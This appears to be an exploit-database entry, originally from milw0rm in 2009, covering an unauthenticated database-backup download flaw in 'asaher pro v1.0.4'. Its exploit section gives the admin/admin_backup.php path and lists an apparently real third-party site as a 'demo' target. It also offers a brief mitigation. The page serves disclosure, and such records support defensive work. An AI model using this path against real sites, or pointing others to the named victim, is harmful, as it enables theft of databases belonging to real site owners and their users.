header-logo
Suggest Exploit
vendor:
pro
by:
alnjm33
7,5
CVSS
HIGH
Remote Database Backup Vulnerability
N/A
CWE
Product Name: pro
Affected Version From: v1.0.4
Affected Version To: v1.0.4
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Re: asaher pro v1.0.4 Remote Database Backup Vulnerability

An attacker can download the database of the vulnerable application by accessing the admin_backup.php page.

Mitigation:

Restrict access to the admin_backup.php page.
Source

Exploit-DB raw data:

:::::::::::::::::::::::::::::::::::::::
found by alnjm33
my site : http://sec-war.com/cc/
mail:alnjm33(at)hotmail.com
::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::Re: asaher pro v1.0.4 Remote Database Backup Vulnerability:::::::::::::::::::::::::::
expolit:
 /path/admin/admin_backup.php <<< you will downlaod the database
view demo
http://daralyamama.com/news/admin/admin_backup.php
::::::::::::::::::::::::::::::::::::::::::::::::::::::::

 Special Thanks : all sec-war.com  members

# milw0rm.com [2009-08-18]